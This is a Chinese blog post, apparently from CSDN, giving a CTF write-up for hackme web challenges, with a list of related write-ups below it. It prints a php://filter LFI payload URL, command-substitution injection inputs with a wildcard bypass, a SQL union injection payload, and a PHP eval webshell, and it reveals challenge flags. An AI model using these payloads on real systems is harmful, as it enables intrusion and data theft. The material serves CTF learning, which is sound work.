hackme 边做边记录

最新推荐文章于 2025-10-08 15:16:02 发布

原创最新推荐文章于 2025-10-08 15:16:02 发布 · 671 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#ctf

web 专栏收录该内容

1 篇文章

订阅专栏

本文详细介绍了通过LFI（本地文件包含）漏洞读取敏感文件的过程。从发现提示到利用封装协议读取PHP源码，再到解码获取flag，展示了完整的攻击流程。同时，文章还涉及命令执行和黑名单绕过技巧。

在login界面查看源代码得到提示

<a href="?page=pages/flag">Flag</a>

想到使用封装协议读取php文件，URL如下：

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

得到php源码

Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K

Can you read the flag<?php require('config.php'); ?>?

接着包含config文件，url如下：

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

读取php源码：

PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==

解密得到flag:FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

homepage

在源代码里面看到js:<script src="cute.js"></script>
点进去是aaencode编码，解码成一个二维码，扫描得flag:FLAG{Oh, You found me!!!!!! Yeeeeeeee.}

ping
命令执行，看到黑名单，没有过滤可以进行命令替换的反引号` 和$()

`ls`

或者

$(ls)

读到flag.php,黑名单过滤了flag，可以用？来通配,由于限制输入长度，所以用`

`sort ????????`

得到flag:FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

南方还是花房

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

hackme（web wp）

Xi4or0uji

09-06

4524

oj说了不要直接给flag，所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&id=-1 union select 1,2,(select table_name fr...

hackme2-dhcp靶场记录

lionwerson的博客

10-10

1368

1.下载靶场下载地址 2.打开虚拟机，导入虚拟机后把网络模式由NAT改为桥接模式，启动。先用浏览器访问一下80端口，是一个登录，没有验证码，可以试一下爆破。我这里还是先注册一下，不行再爆破。可以注册，注册登录之后发现这是一个图书系统。搜索一下试试，显示了所有的图书。但凡有搜索的地方，先试一下sql注入，抓包看一下，post有search参数，手工测试一下。 search存注入，字符型。联合注入一下，试一下字段数。没有注入成功，盲...

参与评论您还未登录，请先登录后发表或查看评论

hackme

2401_86440402的博客

11-06

220

主机发现，查看统一网段下所有IP，寻找靶机IP地址，发信啊靶机IP地址为192.168.25.154首先将hackme靶机和kali都设置为NAT网卡，然后查看靶机的物理地址接着在kali里扫描nmap -sV 192.168.25.0/24 寻找同网段活跃的计算机，找到靶机IP地址找到之后扫描nmap 192.168.25.154我们找到的靶机的IP的端口，寻找到22、80两个端口通过dirb http://192.168.182.181命令查看80端口的详细目录，发现目录为upload访问主页，发现有登

008_Web安全攻防实战：本地文件包含（LFI）漏洞深度分析与利用指南

10-08

914

本地文件包含（Local File Inclusion，简称LFI）是一种常见的Web应用程序漏洞，它允许攻击者通过操纵文件路径参数来读取或执行Web服务器上的敏感文件。与远程文件包含（RFI）不同，LFI仅涉及服务器本地的文件，这使得它在没有外部连接的环境中仍然具有危害性。2025年最新的Web安全报告显示，LFI漏洞仍然是影响Web应用程序安全的主要问题之一，尤其在内容管理系统和自定义Web应用中频繁出现。

HACK ME靶机

qq_49101841的博客

10-01

1378

❀本篇关于信息安全实训时靶场训练的操作笔记。

【靶机渗透】HACKME: 1

安全狐

07-19

1137

【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区，适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日作者 x4bx54 难度初学者，简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite

hackme通关攻略

m0_73771249的博客

09-03

749

输入'报错，#闭合成功，共有三列。使用BP抓包，修改后缀名上传。

hackme2靶场刷题记录

qq_53755216的博客

07-28

709

写在前面最近看到貌似有些靶机挺好玩的下了个靶机来玩一下 nmap扫一下端口扫到了直接进入渗透开始！猜测 search 有sql注入 sqlmap简单梭以下没啥反应。。。回到登录框看看这边有没有什么搞头直接bp扫描器一开直接扫出了一个xss是我没想到的 payload username=admint807c%22%3e%3cscript%3ealert(1)%3c%2fscript%3eoqu8p&password=password <!DOCTYPE html&g

TryHackMe:Startup靶机实战

Mysmycbx的博客

04-02

322

通过尝试，无法在files目录下通过ftp上传文件，那这里进入files/ftp文件夹，然后重新上传shell.php，发现成功，同时在网页上发现了该文件，这里开启监听，然后打开该文件。lennie可以执行planner.sh文件，通过修改print.sh文件，写入反弹shell，成功获得root权限。anonymous尝试登录，登录成功，获取文件查看，其中有个ftp文件夹和两个文件，两个文件没有什么信息。上传linPEAS.sh，赋于权限，执行，发现了感兴趣的文件。kali机器获得这个名字为。

TryHackMe | Blue Writeup （超干货详细msf渗透使用指南）

qq_25755011的博客

02-04

7435

因为给师弟师妹布置了这个任务作为假期渗透作业，是个对ms17_010漏洞利用的学习，而且网上中文的writeup很少(好像直接没有)，所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍，如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台，不用VPN也可以正常使用只是稍微有点卡，各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux （仅用到msf框架与nmap） openvpn与.

hackme-1打靶记录

wwd180的博客

06-12

201

实验主机：hackme-1靶机一台/Kali linux攻击机一台实验网络：桥接网络实验目标：获取靶机的Root权限。

[攻防世界]hackme

逆向萌新的博客

06-23

348

[攻防世界]hackme

靶场（hackme）

2403_83622216的博客

08-25

813

靶场（hackme）sql注入，文件上传

Hackme-Crypto-wp

qq_41509200的博客

09-13

733

Hackme-Crypto-wp 背景：这几天老师要求我们把hackme的题目做出来，于是便开始了新的征程，一定把全部flag找出来，fighting… 题目及解题思路 1、easy 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d 利用经验觉得像16进制转字符串，于是找个在线网站试试还真有点...

Hackme-Web-wp

qq_41509200的博客

09-13

2390

Hackme-Web-wp 背景：这几天老师要求我们把hackme的题目做出来，于是便开始了新的征程，一定把全部flag找出来，fighting… 题目及解题思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 题目描述说离我很近，于是便翻翻网页源代码，果真发现了flag FLAG{0h U...

Hackme Writeup

热门推荐

wywwzjj

05-21

1万+

https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...

攻防世界--hackme

Hk_Mayfly的博客

01-18

388

测试链接：https://adworld.xctf.org.cn/media/task/attachments/33009710e3f44f04b5a4cdbaaa46f00a 1.准备获取信息 64位文件 2.IDA打开 __int64 __fastcall sub_400F8E(__int64 a1, __int64 a2) { char v3[136]; // [rs...

攻防世界-hackme

qq_70851535的博客

11-19

415

逆向分析

Hackme-Misc-wp

qq_41509200的博客

09-13

1478

Hackme-Misc-wp 背景：这几天老师要求我们把hackme的题目做出来，于是便开始了新的征程，一定把全部flag找出来题目及解题思路 1、Flag All flags are in this format: FLAG{This is flag’s format} 题目描述中就是flag FLAG{This is flag's format} 2、corgi can fly ...

hackme靶机通关

12-27

### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞，允许攻击者执行任意SQL查询。对于`hackme2`靶场而言，在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表，这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行某些情况下，Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施，则可能会被用来上载恶意脚本文件（如PHP木马）。一旦成功上传了一句话木马到服务器端，就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口，它会响应来自客户端提交的数据包中携带的指令参数(`cmd`)，从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径，通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别当获得了初步的访问权限之后，下一步便是寻找能够帮助提权的信息或配置错误之处。例如，可以通过查找管理员账户凭证或者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令，进而完全掌控整个系统环境[^1]。